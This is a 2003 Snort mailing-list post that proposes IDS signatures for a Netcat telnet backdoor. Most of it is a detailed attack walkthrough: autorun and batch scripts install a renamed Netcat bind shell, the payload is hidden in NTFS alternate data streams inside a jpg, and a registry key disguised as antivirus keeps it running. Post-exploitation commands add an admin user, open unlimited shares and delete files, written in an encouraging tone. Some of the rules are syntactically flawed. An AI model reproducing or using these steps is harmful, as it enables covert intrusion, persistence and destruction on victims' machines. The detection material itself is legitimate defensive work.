[Snort-sigs] Netcat telnet attack signature (change 1)

Graham, Jeffery A. MAJ - G6 Jeffery.graham at ...1848...
Tue Sep 16 06:47:10 EDT 2003


UPDATE: Cleaned up the crash caused by the Reference syntax error and
uppercase "A" on alert.



alert tcp $TELNET_SERVERS any -> any any (msg:TELNET Netcat Remote Shell
Exploit"; flow:from_server,established; content:"|5c 77 69 63|";

alert tcp $TELNET_SERVERS any -> any any (msg:"TELNET Netcat shell exploit";
flow:from_server,established; content:"|3e|";



Sid: Not Assigned, but should be 700 series, Telnet-based command shell




Detects a Netcat.exe exploit against Windows-based Operating System client,
regardless of what Netcat.exe has been renamed, using telnet on any port,
whereby Netcat.exe issues a remote command shell prompt to the client
operating at the currently logged-on user's credentials on the telnet
server.  Issuance of a command shell prompt from server to client is not a
normal telnet log on operation. SID 2123 detects command shell, with the
follow exception !21:23 (see false positives, below). 


|3e| is the Hex address for the command prompt ">" and detects any issuance
of the command shell prompt from the telnet server side to the client.


|5c 77 69 6e| is the Hex address for "\win" (\windows, \winnt, \win32,
\winnt\system32, etc.) and detects any issuance of the command shell prompt
from the telnet server side to the client.


alert tcp $TELNET_SERVERS any -> $HOME_NET any (msg:"TELNET Netcat shell
exploit"; flow:from_server,established; content:"|3e|";


alert tcp $TELNET_SERVERS any -> $HOME_NET any (msg:"TELNET Netcat shell
exploit"; flow:from_server,established; content:"|5c 77 69 6e|";


alert tcp $TELNET_SERVERS any -> $EXTERNAL_NET any (msg:"TELNET Netcat shell
exploit"; flow:from_server,established; content:"|3e|";


alert tcp $TELNET_SERVERS any -> $EXTERNAL_NET any (msg:"TELNET Netcat shell
exploit"; flow:from_server,established; content:"|5c 77 69 6e|";


Rules may be reduced to two by changing $EXTERNAL_NET and $HOME_NET to any.







Detailed Information:



Netcat Social Engineering Exploit (NSEE)


The NSEE consists of 3 files and a autorun.inf: 

-svchost.exe (Netcat, could be renamed anything...bios.exe, etc)

-start.bat (could be renamed anything...picview.bat, etc)

-short.lnk (a shortcut link for system boots and contains Netcat parameters)

I have included an autorun.inf for burning to CD-ROM for self-install on
autorun-enabled CD-ROMs.



Execute start.bat, which has the following entries:

@echo off

copy svchost.exe %systemroot%\ 

copy short.* %systemroot%\

regedit.exe /s
"keyname:keyvalue (such as the short.lnk)




The autorun.inf will execute start.bat automatically if burned to CD-ROM.


The following occurs:

Netcat is copied as svchost.exe to %systemroot%\ (hides the process, but
doesn't harm %systemroot%\system32\svchost.exe original system file).

short.lnk is copied to %systemroot%.

The registry key 


"keyname:keyvalue" (such as short.lnk) is copied to the registry.

short.lnk is executed and the batch ends.


What has been accomplished? All required files are copied to %systemroot%,
where they are less likely to be deleted by the User or Administrator.  The
short.lnk has the options set to run svchost.exe (Netcat.exe) with several
command line options. It appears on the shortcut target location as
%systemroot%\svchost.exe -d -l -p (whatever) -t -e cmd.exe -L, which is
started immediately.  



The registry key ensures that Netcat is restarted with each reboot or logon
without showing up in the startup folder.  Short.lnk starts the shortcut
immediately without a logoff/logon or restart.


The Netcat flags and options accomplish the following:

-d minimized, detached from the command console

-l listens 

-p 23 on port 23 (could be any port; in the example above, port 9056)

-t handle telnet negotiations automatically

-e execute (with victims privilege)

cmd.exe command shell (could be any program)

-L maintain persistence (wait for me to connect again if I am disconnected).



Netcat ADS Proof of Concept


NTFS supports alternate data streams (ADS), so this variation packs the
support files into a .jpg using the command type [location]\file >
[location]\file.jpg:file.ext.  ADS can only survive in ADS-aware operating
systems, and is passed within an NTFS LAN or potentially from the Internet,
across a firewall in an email or malicious web page.  I have tested the ADS
streams passed by email with very limited success.  Due to the fact that
moving the ADS packed files to a non-NTFS partition will strip the alternate
streams, passage by floppy disk is not feasible.  However, I was able to
format a 1 Gigabyte USB Drive to NTFS, which allowed portability of the
packed ADS file without loss of the ADS data.


For this proof of concept I packed four files into the .jpg labeled


-Shhhhh!.lnk (a shortcut.lnk with the options set as previously discussed)

-Shhhhh!.reg (a registry hack with the /s option which suppresses

-Svchost.exe (Netcat.exe renamed to simulate a legitimate process)

-Ads-cp.exe (an ADS copy program by Randy Miller which copies files to and
from alternate data streams)



Netcat ADS Preparation


First, select an interesting file that others might wish to download, or
view.  Then prepare each pack file in turn.  Rename Netcat.exe to
svchost.exe or any other legitimate sounding Windows process.  Move
svchost.exe to a donor machine in the %systemroot% directory.  Create a
desktop shortcut for svchost.exe with the target options set as previously
discussed to create the telnet listener.  The donor file must be in the
target location or the options in the shortcut.lnk will be invalid.  Once
the shortcut is created, the svchost.exe file in the donor machine
%systemroot% directory may be removed.  Next, prepare the registry entry.


The registry entry is, as follows:


Windows Registry Editor Version 5.00





The Ads-cp.exe file will be used to copy and extract the ADS as required.


Now, pack all four prepared files into the jpg or other interesting file.
In this test, I packed:


Shhhhh!.lnk ---> into mywife.jpg

Shhhhh!.reg ---> into mywife.jpg

Svchost.exe ---> into mywife.jpg

Ads-cp.exe ----> into mywife.jpg


A Crucial Security ADS scan of the file reveals the following:


!!! ADS FOUND !!! Name=:ads-cp.exe:$DATA File=C:\\mywife.jpg

!!! ADS FOUND !!! Name=:shhhhh!.lnk:$DATA File=C:\\mywife.jpg

!!! ADS FOUND !!! Name=:shhhhh!.reg:$DATA File=C:\\mywife.jpg

!!! ADS FOUND !!! Name=:svchost.exe:$DATA File=C:\\mywife.jpg


Windows NTFS maintains the ADS, but does not display them under normal
circumstances.  Also, the size of the original file is displayed with a
directory or file listing.


Finally, a startwife.bat is created with the following entries:


 @echo off


copy mywife.jpg %systemroot%


start %systemroot%\mywife.jpg:ads-cp.exe mywife.jpg:svchost.exe


start %systemroot%\mywife.jpg:ads-cp.exe mywife.jpg:shhhhh!.lnk


start %systemroot%\mywife.jpg:ads-cp.exe mywife.jpg:shhhhh!.reg


regedit.exe /s %systemroot%\shhhhh!.reg






del %systemroot%\shhhhh!.reg





This batch extracts the ADS into useable files by:


Copying mywife.jpg to %systemroot%

Extracts shhhhh!.lnk, shhhhh!.reg and svchost.exe to %systemroot%

Regedit /s modifies the registry by adding a new key with the shhhhh!.lnk as
data value and suppressed the confirmation screen.  In this case, the
registry key is called rtvscan to hide as Symantec's realtime file virus

The shortcut.lnk is executed immediately without requiring reboot or
logoff/logon and the picture is displayed for the victim.  For cleanup, the
shhhhh!.reg entry is removed from %systemroot%.



The Attack Aftermath (Penetration and Escalation).


When the attacking computer telnets to victim (e.g. telnet victim port), a
command shell is issued to the attacker with the victim's user rights
(admin, power user, etc.) and operates directly on the victim's computer
without their knowledge. If the attacker were to issue the command dir a:\,
it checks the victim's floppy disk drive.  A command of rmdir /s /q would
attempt to delete all files and directories without confirmation from the
victim.  Use your imagination to figure out all the menace that could be
accomplished via the command shell. 


Since the start.lnk was copied to the registry and was modified to run at
each reboot, it starts every time the computer is rebooted and with luck and
patience, you may score administrator rights!  Delete or rename some system
files, cause some general havoc and most users will call for a System
Administrator to check out their computer problems.



Net user /add hacker hacker (a bit obvious)

Net localgroup administrators /add hacker (add yourself to the admin


If you were able to add yourself to the localgroup, and the drives are
shared or had hidden or administrative admin$ shares.  In a browser:
IP_Address/admin$ or IP_Address/c$ if C: is root.  You can determine that by
doing a directory listing after you connect by Netcat.  If drives are not
shared, see below and try again.


How about unlimited access and drive sharing?

net share root=c:\ /unlimited

net share adrive=a:\ /unlimited

net share cdrive=c:\ /unlimited

net share ddrive=d:\ /unlimited

net share edrive=e:\ /unlimited


If the commands were successful, you will have GUI access to the machine by
opening a browser and typing the IP_Address/root or adrive, etc.


Registry edits are now possible through the command line.


If you're not being stealthy and want to get them in trouble, how about

Start www[.]whitehouse[.]com 



Affected Systems:

The NSEE can affect server and workstation versions of Windows NT, 2000, XP
Home and Pro systems using known Netcat syntax and options. 

NSEE can also affect Win9x, ME systems with minors scripting modifications.

NADS affect only NT File System (NTFS) systems such as server and
workstation versions of Windows NT, 2000, XP Home and Pro.



Attack Scenarios:

Exploits the victim's (logged on user) computer within 3 seconds of physical
access to the floppy disk drive, USB or CD-ROM drive (use the autorun.inf)
turning it into a telnet listener, even if file and print sharing is
disabled or they are fire-walled.  This could be deployed on Internet, LAN
or Email through social engineering methods (e.g. nudepics.bat,
antivirs.bat, etc.).



Ease of Attack:



False Positives:

Could produce false positive if Telnet server issues \win string to client.
Can sometimes also be detected by SID 2123, if the Telnet port designated by
Netcat is 21-23 and the command shell is issued from those ports.  SID 2123
is designed to overlook those ports e.g. !21:23


False Negatives:

Not produced a false negative, to date.


Corrective Action:

Virus scanners will not pick up the attack.  Because most of the files were
renamed and hidden in %systemroot%, most users and administrators will not
notice their location.  In the Graphical User Interface, Windows even
assists us in this process by warning the User that this is a system folder
and that files in this folder should not be modified.  


After installation, there is no way to detect the telnet listener, except
for the following:

Ctrl-Alt-Del, Task Manager, pslist or fport, if the connection is made.  The
Netcat listener is not listed as an application, but as a service in the
process tab with the logged in User's rights showing as svchost.exe.  If
Netcat had been renamed to smsapm32.exe or something like that, detection
would be as difficult.  If the victim is running a personal firewall, Netcat
will ask for permission to listen the first time it runs as svchost.exe.
Svchost.exe will be detected in the Windows Task Manager Process tab as
svchost.exe, with Username column showing [current user], where this process
would normally be listed as System, Network Service or Local Service. During
attack, when the attacker is executing the command shell, that will also
show up cmd.exe in the process tab.  Detection by a skilled user is highly
unlikely. Also, the victim could notice a new key in the Registry, in this
case keyed as rtvscan (also highly unlikely).




 If attacker inadvertently runs executables such as cleanmgr.exe, it will
cause pop-ups on the victim computer.  They may believe they've been
infected with a virus and begin to investigate.  This can be fun, but is not
very stealthy.





Removal of the file from the process manager only terminates the telnet
listener until the next reboot.  Victim must also remove the Registry key
from the Run entry, and should also do a search for the process and delete
the executable from %systemroot%\ or wherever it was installed.  Pslist,
Pskill and Fport will assist in tracking down the offending files, whatever
their names.  Drivers, from the Windows 2000 Resource Kit will allow you to
check what drivers are loaded.






It is imperative that all users lock workstations, when they leave their
desks, via Ctrl-Alt-Del, Lock Computer.  This will prevent insertion of the
exploit with their credentials, and possibly later, Administrative
credentials.  Also, users should never open and run email attachments, such
as batch files or executables.  Since these exploits do not trigger virus
scanners, do not depend on them to protect you from backdoors or ADS


Servers should be in a locked, secure site with all access ports (USB,
floppy/removable, fire wire, serial, parallel, mouse and keyboard) covered
and locked.  Servers and critical workstations should have file compares run
for known baseline drivers periodically.  Compare and analyze the
differences. An example of this would be:


Drivers > baseline20030701 (stored and MD5 check-summed)

Drivers > new20030730

FC /N baseline20030701 new20030730


 Check with your Network Administrator to see if personal firewalls are
allowed on the network; if so, they will alert you to the telnet activation
and command shell issuance to a remoter user.




Jeff Graham, jgraham61 at ...12... <mailto:jgraham61 at ...12...>  



Additional References:

Snort 2.0 Alert IDS log: [**] [1:0:0] TELNET Netcat shell exploit [**]

[Classification: Executable code was detected] [Priority: 1] 

09/09-16:20:06.769891 0:0:4C:F3:D:65 -> 0:0:4C:F3:82:5C type:0x800 len:0x9F -> TCP TTL:128 TOS:0x0 ID:1890 IpLen:20
DgmLen:145 DF

***AP*** Seq: 0x296A74F4  Ack: 0x113CFFF2  Win: 0x4470  TcpLen: 20


Hobbit- Netcat Unix and documentation, 1996,  <http://www.@...1849.../>
www. at ...1849... 

@stake- Netcat 1.1 for Windows, Hobbit and Chris Wysopal, 1998,
<http://www.@...1849.../> www. at ...1849... 

Foundstone- Fport, Pslist, Pskill  <http://www.foundstone.com/>

Microsoft Corp- Drivers, Windows 2000 Resource Kit, 1985-2000,
<http://www.microsoft.com/> www.microsoft.com 

Randy Miller- Sytex, ADS copy, 2002 

Scot Wiedenfeld- Sytex, 2003 

Crucial Security- Crucial ADS, 2000, www.crucialsecurity.com




Major Jeffery A. Graham


Joint Warfighter Support Division

Information Assurance Branch


367-6654 DSN


-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.snort.org/pipermail/snort-sigs/attachments/20030916/07c1ae70/attachment.html>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image001.jpg
Type: image/jpeg
Size: 17511 bytes
Desc: not available
URL: <https://lists.snort.org/pipermail/snort-sigs/attachments/20030916/07c1ae70/attachment.jpg>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image002.jpg
Type: image/jpeg
Size: 47198 bytes
Desc: not available
URL: <https://lists.snort.org/pipermail/snort-sigs/attachments/20030916/07c1ae70/attachment-0001.jpg>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image003.jpg
Type: image/jpeg
Size: 28788 bytes
Desc: not available
URL: <https://lists.snort.org/pipermail/snort-sigs/attachments/20030916/07c1ae70/attachment-0002.jpg>

More information about the Snort-sigs mailing list